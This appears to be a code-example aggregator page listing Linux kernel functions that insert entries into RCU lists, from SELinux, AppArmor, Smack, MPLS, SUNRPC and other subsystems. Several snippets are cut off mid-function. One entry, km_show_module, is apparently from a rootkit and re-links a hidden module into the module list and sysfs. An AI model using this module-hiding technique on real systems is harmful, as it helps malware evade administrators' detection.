/**
 * sel_netnode_insert - Insert a new node into the table
 * @node: the new node record
 *
 * Description:
 * Add a new node record to the network address hash table.
 *
 */
static void sel_netnode_insert(struct sel_netnode *node)
{
    unsigned int idx;

    switch (node->nsec.family) {
    case PF_INET:
        idx = sel_netnode_hashfn_ipv4(node->nsec.addr.ipv4);
        break;
    case PF_INET6:
        idx = sel_netnode_hashfn_ipv6(&node->nsec.addr.ipv6);
        break;
    default:
        BUG();
    }

    /* we need to impose a limit on the growth of the hash table so check
     * this bucket to make sure it is within the specified bounds */
    list_add_rcu(&node->list, &sel_netnode_hash[idx].list);
    if (sel_netnode_hash[idx].size == SEL_NETNODE_HASH_BKT_LIMIT) {
        struct sel_netnode *tail;
        tail = list_entry(
                   rcu_dereference(sel_netnode_hash[idx].list.prev),
                   struct sel_netnode, list);
        list_del_rcu(&tail->list);
        kfree_rcu(tail, rcu);
    } else
Esempio n. 2
0
static void __insert_vmap_area(struct vmap_area *va)
{
	struct rb_node **p = &vmap_area_root.rb_node;
	struct rb_node *parent = NULL;
	struct rb_node *tmp;

	while (*p) {
		struct vmap_area *tmp;

		parent = *p;
		tmp = rb_entry(parent, struct vmap_area, rb_node);
		if (va->va_start < tmp->va_end)
			p = &(*p)->rb_left;
		else if (va->va_end > tmp->va_start)
			p = &(*p)->rb_right;
		else
			BUG();
	}

	rb_link_node(&va->rb_node, parent, p);
	rb_insert_color(&va->rb_node, &vmap_area_root);

	/* address-sort this list so it is usable like the vmlist */
	tmp = rb_prev(&va->rb_node);
	if (tmp) {
		struct vmap_area *prev;
		prev = rb_entry(tmp, struct vmap_area, rb_node);
		list_add_rcu(&va->list, &prev->list);
	} else
Esempio n. 3
0
static struct aa_ns *__aa_create_ns(struct aa_ns *parent, const char *name,
				    struct dentry *dir)
{
	struct aa_ns *ns;
	int error;

	AA_BUG(!parent);
	AA_BUG(!name);
	AA_BUG(!mutex_is_locked(&parent->lock));

	ns = alloc_ns(parent->base.hname, name);
	if (!ns)
		return NULL;
	mutex_lock(&ns->lock);
	error = __aa_fs_ns_mkdir(ns, ns_subns_dir(parent), name);
	if (error) {
		AA_ERROR("Failed to create interface for ns %s\n",
			 ns->base.name);
		mutex_unlock(&ns->lock);
		aa_free_ns(ns);
		return ERR_PTR(error);
	}
	ns->parent = aa_get_ns(parent);
	ns->level = parent->level + 1;
	list_add_rcu(&ns->base.list, &parent->sub_ns);
	/* add list ref */
	aa_get_ns(ns);
	mutex_unlock(&ns->lock);

	return ns;
}
Esempio n. 4
0
void add_entry_stack(int num1,int num2)  
{
	p=kmalloc(sizeof(*p),GFP_KERNEL);
	p->data_item1=num1;
	p->data_item2=num2;
	list_add_rcu(&p->list,&head);
}
Esempio n. 5
0
static void
km_show_module(
    const char* const       data
)
{
    kobject*				kobj = &THIS_MODULE->mkobj.kobj;

    // Check to ensure we're hidden first...
    if ( !g_state.hidden )
    {
        return;
    }

    g_state.hidden = 0;

    // Add to modules list
    mutex_lock( &module_mutex );
    list_add_rcu( &THIS_MODULE->list, g_modules);
    mutex_unlock( &module_mutex );

    // Increment parent ref count in sysfs
    kobject_get( kobj->parent );

    // Add to sysfs
    kset_get( kobj->kset );
    spin_lock( &kobj->kset->list_lock );
    list_add_tail( &kobj->entry, &kobj->kset->list );
    spin_unlock( &kobj->kset->list_lock );

    kobj->state_in_sysfs = 1;

    mutex_lock( g_sysfs_mutex );
    sysfs_link_sibling( kobj->sd );
    mutex_unlock( g_sysfs_mutex );
}
Esempio n. 6
0
/**
 * fc_rport_create() - Create a new remote port
 * @lport: The local port this remote port will be associated with
 * @ids:   The identifiers for the new remote port
 *
 * The remote port will start in the INIT state.
 *
 * Locking note:  must be called with the disc_mutex held.
 */
static struct fc_rport_priv *fc_rport_create(struct fc_lport *lport,
					     u32 port_id)
{
	struct fc_rport_priv *rdata;

	rdata = lport->tt.rport_lookup(lport, port_id);
	if (rdata)
		return rdata;

	rdata = kzalloc(sizeof(*rdata) + lport->rport_priv_size, GFP_KERNEL);
	if (!rdata)
		return NULL;

	rdata->ids.node_name = -1;
	rdata->ids.port_name = -1;
	rdata->ids.port_id = port_id;
	rdata->ids.roles = FC_RPORT_ROLE_UNKNOWN;

	kref_init(&rdata->kref);
	mutex_init(&rdata->rp_mutex);
	rdata->local_port = lport;
	rdata->rp_state = RPORT_ST_INIT;
	rdata->event = RPORT_EV_NONE;
	rdata->flags = FC_RP_FLAGS_REC_SUPPORTED;
	rdata->e_d_tov = lport->e_d_tov;
	rdata->r_a_tov = lport->r_a_tov;
	rdata->maxframe_size = FC_MIN_MAX_PAYLOAD;
	INIT_DELAYED_WORK(&rdata->retry_work, fc_rport_timeout);
	INIT_WORK(&rdata->event_work, fc_rport_work);
	if (port_id != FC_FID_DIR_SERV)
		list_add_rcu(&rdata->peers, &lport->disc.rports);
	return rdata;
}
/* assumes ctl_mtx is held */
static void _insert_ssd(struct ssd_info *const ssd)
{
	BUG_ON(NULL == ssd || 0 == ssd->dev_t);
	{
		const uint32_t hv = hash_32(ssd->dev_t, 32) % IOSTASH_MAXSSD_BCKTS;
		struct list_head *const b = &gctx.ssdtbl.bucket[hv];
		list_add_rcu(&ssd->list, b);
		/* beyond this point ssd might be referenced */
		DBG("inserted ssd struct ptr=%p into bucket %u.\n", ssd, hv);
	}
}
Esempio n. 8
0
void tiqdio_add_input_queues(struct qdio_irq *irq_ptr)
{
	struct qdio_q *q;
	int i;

	/* No TDD facility? If we must use SIGA-s we can also omit SVS. */
	if (!css_qdio_omit_svs && irq_ptr->siga_flag.sync)
		css_qdio_omit_svs = 1;

	for_each_input_queue(irq_ptr, q, i) {
		list_add_rcu(&q->entry, &tiq_list);
		synchronize_rcu();
	}
Esempio n. 9
0
/**
 * sel_netif_insert - Insert a new interface into the table
 * @netif: the new interface record
 *
 * Description:
 * Add a new interface record to the network interface hash table.  Returns
 * zero on success, negative values on failure.
 *
 */
static int sel_netif_insert(struct sel_netif *netif)
{
    int idx;

    if (sel_netif_total >= SEL_NETIF_HASH_MAX)
        return -ENOSPC;

    idx = sel_netif_hashfn(netif->nsec.ifindex);
    list_add_rcu(&netif->list, &sel_netif_hash[idx]);
    sel_netif_total++;

    return 0;
}
Esempio n. 10
0
int 
mpls_insert_nhlfe (unsigned int key, struct mpls_nhlfe *nhlfe) 
{
	int retval = 0;
	retval = radix_tree_insert (&mpls_nhlfe_tree, key, nhlfe);
	if (unlikely(retval))
		retval = -ENOMEM;

	list_add_rcu(&nhlfe->global, &mpls_nhlfe_list);

	/* hold it for being in the tree */
	mpls_nhlfe_hold (nhlfe);
	return retval;
}
Esempio n. 11
0
int 
mpls_insert_ilm (unsigned int key, struct mpls_ilm *ilm) 
{
	int retval = 0;

	mpls_ilm_hold (ilm);
	retval = radix_tree_insert (&mpls_ilm_tree, key, ilm);
	if (unlikely(retval)) {
		MPLS_DEBUG("Error create node with key %u in radix tree\n",key);
		retval = -ENOMEM;
	}
	list_add_rcu(&ilm->global, &mpls_ilm_list);
	return retval;
}
Esempio n. 12
0
struct svc_rqst *
svc_prepare_thread(struct svc_serv *serv, struct svc_pool *pool, int node)
{
	struct svc_rqst	*rqstp;

	rqstp = svc_rqst_alloc(serv, pool, node);
	if (!rqstp)
		return ERR_PTR(-ENOMEM);

	serv->sv_nrthreads++;
	spin_lock_bh(&pool->sp_lock);
	pool->sp_nrthreads++;
	list_add_rcu(&rqstp->rq_all, &pool->sp_all_threads);
	spin_unlock_bh(&pool->sp_lock);
	return rqstp;
}
Esempio n. 13
0
/**
 * sel_netport_insert - Insert a new port into the table
 * @port: the new port record
 *
 * Description:
 * Add a new port record to the network address hash table.
 *
 */
static void sel_netport_insert(struct sel_netport *port)
{
	unsigned int idx;

	/* we need to impose a limit on the growth of the hash table so check
	 * this bucket to make sure it is within the specified bounds */
	idx = sel_netport_hashfn(port->psec.port);
	list_add_rcu(&port->list, &sel_netport_hash[idx].list);
	if (sel_netport_hash[idx].size == SEL_NETPORT_HASH_BKT_LIMIT) {
		struct sel_netport *tail;
		tail = list_entry(
			rcu_dereference(sel_netport_hash[idx].list.prev),
			struct sel_netport, list);
		list_del_rcu(&tail->list);
		kfree_rcu(tail, rcu);
	} else
Esempio n. 14
0
/* kref_get() if @key is already added */
static struct au_dykey *dy_gadd(struct au_splhead *spl, struct au_dykey *key)
{
	struct au_dykey *tmp, *found;
	struct list_head *head;
	const void *h_op = key->dk_op.dy_hop;

	found = NULL;
	head = &spl->head;
	spin_lock(&spl->spin);
	list_for_each_entry(tmp, head, dk_list)
		if (tmp->dk_op.dy_hop == h_op) {
			kref_get(&tmp->dk_kref);
			found = tmp;
			break;
		}
	if (!found)
		list_add_rcu(&key->dk_list, head);
	spin_unlock(&spl->spin);

	if (!found)
		DyPrSym(key);
	return found;
}
Esempio n. 15
0
/**
 * smk_set_access - add a rule to the rule list
 * @srp: the new rule to add
 * @rule_list: the list of rules
 * @rule_lock: the rule list lock
 *
 * Looks through the current subject/object/access list for
 * the subject/object pair and replaces the access that was
 * there. If the pair isn't found add it with the specified
 * access.
 *
 * Returns 1 if a rule was found to exist already, 0 if it is new
 * Returns 0 if nothing goes wrong or -ENOMEM if it fails
 * during the allocation of the new pair to add.
 */
static int smk_set_access(struct smack_rule *srp, struct list_head *rule_list,
				struct mutex *rule_lock)
{
	struct smack_rule *sp;
	int found = 0;

	mutex_lock(rule_lock);

	list_for_each_entry_rcu(sp, rule_list, list) {
		if (sp->smk_subject == srp->smk_subject &&
		    sp->smk_object == srp->smk_object) {
			found = 1;
			sp->smk_access = srp->smk_access;
			break;
		}
	}
	if (found == 0)
		list_add_rcu(&srp->list, rule_list);

	mutex_unlock(rule_lock);

	return found;
}